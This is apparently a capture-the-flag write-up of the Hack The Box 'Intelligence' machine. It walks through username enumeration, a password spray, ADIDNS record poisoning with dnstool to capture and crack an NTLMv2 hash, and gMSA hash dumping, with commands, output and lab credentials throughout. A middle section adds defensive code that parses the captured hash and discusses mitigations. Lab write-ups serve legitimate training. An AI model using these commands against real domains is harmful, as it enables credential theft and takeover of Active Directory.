Intelligence HTB

Nmap Scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 12:15:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
55478/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Domain: intelligence.htb. Two PDFs were found on the HTTP page; their metadata gives us two usernames:

┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $pdfinfo 2020-01-01-upload.pdf 
Creator:        William.Lee
Tagged:         no
UserProperties: no
Suspects:       no
Form:           none
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      26835 bytes
Optimized:      no
PDF version:    1.5
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $pdfinfo 2020-12-15-upload.pdf 
Creator:        Jose.Williams
Tagged:         no
UserProperties: no
Suspects:       no
Form:           none
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      27242 bytes
Optimized:      no
PDF version:    1.5
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]
└──╼ $/opt/kerbrute userenum --dc intelligence.htb -d intelligence.htb users.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/04/21 - Ronnie Flathers @ropnop

2021/07/04 06:01:55 >  Using KDC(s):
2021/07/04 06:01:55 >   intelligence.htb:88

2021/07/04 06:01:55 >  [+] VALID USERNAME:       jose.williams@intelligence.htb
2021/07/04 06:01:55 >  [+] VALID USERNAME:       william.lee@intelligence.htb
2021/07/04 06:01:55 >  Done! Tested 2 usernames (2 valid) in 0.160 seconds
┌─[htb-tinyb0y@htb-ns1vnkkslu]─[~/my_data/Intelligence]

Enumerate more documents:

import datetime
import requests

# The two known documents follow a YYYY-MM-DD-upload.pdf naming scheme, so walk
# every calendar day from 2019-01-01 to 2021-12-31 and keep the ones that exist.
# Iterating datetime.date objects avoids probing impossible dates such as 02-30.
BASE = "http://intelligence.htb/documents/"
start = datetime.date(2019, 1, 1)
end = datetime.date(2021, 12, 31)
session = requests.Session()

def url_ok(url):
    """Return the HTTP status code of a HEAD request, or None on a network error."""
    try:
        return session.head(url, timeout=5).status_code
    except requests.RequestException:
        return None

day = start
while day <= end:
    url = BASE + day.strftime("%Y-%m-%d") + "-upload.pdf"
    if url_ok(url) == 200:
        print(url + "\t" + "Document Exists")
    day += datetime.timedelta(days=1)

We found nearly 100 more documents; let's extract the unique creators from their metadata into a user list:

└──╼ $cat users.txt 
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee

Let's see the content inside the PDF files:

pdftotext -layout -f 0 -l 5 2020-01-01-upload.pdf target.txt

One of the documents contains a default password for new accounts.

Password: NewIntelligenceCorpUser9876

Password spray the user list with this password using crackmapexec:


SMB         10.129.170.145  445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876



└──╼ $more downdetector.ps1 
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

sudo mount -t cifs -o username=tiffany.molina //10.129.170.145/Users /home/htb-tinyb0y/tiffy/  

NTUSER.dat (a user registry hive; regipy can parse it): https://kalilinuxtutorials.com/regipy-python-library-registry-hives/

from ldap3 import Server, Connection, ALL, NTLM

# Authenticated LDAPS bind as Tiffany.Molina; the raw string keeps "\T" from
# being read as an escape sequence.
server = Server('intelligence.htb', get_info=ALL, port=636, use_ssl=True)
connection = Connection(server, user=r'intelligence.htb\Tiffany.Molina',
                        password='NewIntelligenceCorpUser9876', authentication=NTLM)
if not connection.bind():
    raise SystemExit(f"bind failed: {connection.result}")
print(server.info)
#connection.search(search_base='DC=DomainDnsZones,DC=intelligence,DC=htb', search_filter='(&(objectClass=web*))', search_scope='SUBTREE', att>
#  CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
# List every object under the DNS zone container that downdetector.ps1 iterates over.
connection.search(search_base='CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb',
                  search_filter='(objectClass=*)')

print(connection.entries) 


dnstool.py from krbrelayx: https://github.com/dirkjanm/krbrelayx

└──╼ $python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r web6.intelligence.htb --data 10.10.14.7 10.129.3.59
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/htb-tinyb0y/my_data/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.129.136.121
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:d2441b695e3f32e...
[*] Skipping previously captured hash for intelligence\Ted.Graves
[*] Skipping previously captured hash for intelligence\Ted.Graves

Let's crack the hash to recover the password:

hash.txt
-------------------
Ted.Graves::intelligence:d2441b695e3f32e8:4CB1E732AE7007F1973C3F24C57D3666:010100000000000085A5FAF62971D701C0C21B070187A78E000000000200080053004F0032004B0001001E00570049004E002D0037005300370059004A00560042005A003200560050000400140053004F0032004B002E004C004F00430041004C0003003400570049004E002D0037005300370059004A00560042005A003200560050002E0053004F0032004B002E004C004F00430041004C000500140053004F0032004B002E004C004F00430041004C000800300030000000000000000000000000200000C8DA2749AD49557D25F6EAC0F1B9FE3A5F2D739E28D89952449FC0A4915768C70A001000000000000000000000000000000000000900340048005400540050002F0077006500620036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
--------------------

hashcat -m 5600 hash.txt --force

TED.GRAVES::intelligence:d2441b695e3f32e8:4cb1e732ae7007f1973c3f24c57d3666:...:Mr.Teddy

User: Ted.Graves Pass: Mr.Teddy
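The hash.txt line above is worth reading as data rather than just feeding it to hashcat: the `-m 5600` format is the raw NTLMv2_RESPONSE structure from MS-NLMP, and its AV_PAIR target information records what the client believed it was authenticating to. The following Python is an added example, not part of the original writeup nor of Responder or hashcat. It parses the captured line and decodes the blob's timestamp, client challenge and AV pairs; the only assumption is the AV_PAIR id table, taken from MS-NLMP section 2.2.2.1. For a defender the interesting fields are `MsvAvTargetName` (the client fills this in from the URL it connected to, here the `web6` record added with dnstool) and `MsvAvChannelBindings` (all zeros means the client did not bind NTLM to a TLS channel, so a service enforcing Extended Protection for Authentication would have rejected this response).

```python
import struct
from datetime import datetime, timedelta, timezone

# NetNTLMv2 line from hash.txt above, hashcat -m 5600 format:
# user::domain:server_challenge:NTProofStr:ntlmv2_blob. Copied from the writeup,
# split here by field so the structure is visible.
HASH_LINE = (
    "Ted.Graves::intelligence:d2441b695e3f32e8:4CB1E732AE7007F1973C3F24C57D3666:"
    "010100000000000085A5FAF62971D701C0C21B070187A78E00000000"          # fixed header
    "0200080053004F0032004B00"                                           # NbDomainName
    "01001E00570049004E002D0037005300370059004A00560042005A00320056005000"  # NbComputerName
    "0400140053004F0032004B002E004C004F00430041004C00"                   # DnsDomainName
    "03003400570049004E002D0037005300370059004A00560042005A003200560050"
    "002E0053004F0032004B002E004C004F00430041004C00"                     # DnsComputerName
    "0500140053004F0032004B002E004C004F00430041004C00"                   # DnsTreeName
    "0800300030000000000000000000000000200000C8DA2749AD49557D25F6EAC0"
    "F1B9FE3A5F2D739E28D89952449FC0A4915768C7"                           # SingleHost
    "0A00100000000000000000000000000000000000"                           # ChannelBindings
    "0900340048005400540050002F0077006500620036002E0069006E00740065006C"
    "006C006900670065006E00630065002E00680074006200"                     # TargetName
    "0000000000000000"                                                   # EOL + padding
)

# AV_PAIR ids from MS-NLMP 2.2.2.1 (assumed table, not from the writeup).
AV_NAMES = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UNICODE_AV = {1, 2, 3, 4, 5, 9}  # pairs whose value is a UTF-16LE string


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line):
    """Split a hashcat 5600 line and decode the NTLMv2_RESPONSE blob it carries."""
    user, _empty, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_RESPONSE blob (RespType/HiRespType must be 1)")
    # Header: RespType(1) HiRespType(1) Reserved1(2) Reserved2(4)
    #         TimeStamp(8) ChallengeFromClient(8) Reserved3(4); AV pairs start at 28.
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    av_pairs = {}
    offset = 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        value = blob[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, f"MsvAvUnknown{av_id}")
        av_pairs[name] = value.decode("utf-16-le") if av_id in UNICODE_AV else value.hex()
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge.lower(),
        "nt_proof_str": nt_proof.lower(),
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "av_pairs": av_pairs,
        # 16 zero bytes: no TLS channel binding, i.e. EPA was not in play.
        "channel_bindings_zero": av_pairs.get("MsvAvChannelBindings") == "00" * 16,
    }


if __name__ == "__main__":
    info = parse_netntlmv2(HASH_LINE)
    print(f"{info['domain']}\\{info['user']} authenticated at "
          f"{info['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    for name, value in info["av_pairs"].items():
        print(f"  {name:22} {value}")
    print("channel bindings present:", not info["channel_bindings_zero"])
```

The NetBIOS and DNS names in the pairs are whatever the challenging server advertised in its CHALLENGE message, so here they describe the capture listener rather than intelligence.htb; only `MsvAvTargetName` comes from the client side and names the `HTTP/web6.intelligence.htb` service the scheduled script was talked into contacting. That combination, a target name that is not a legitimate web host plus empty channel bindings, is exactly what SMB/LDAP signing, EPA on HTTP endpoints and restricting who may create ADIDNS records are meant to prevent.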

$python gMSADumper.py -u "Ted.Graves" -p "Mr.Teddy" -l 10.129.181.205 -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7
getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT  DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD
This post is licensed under CC BY 4.0 by the author.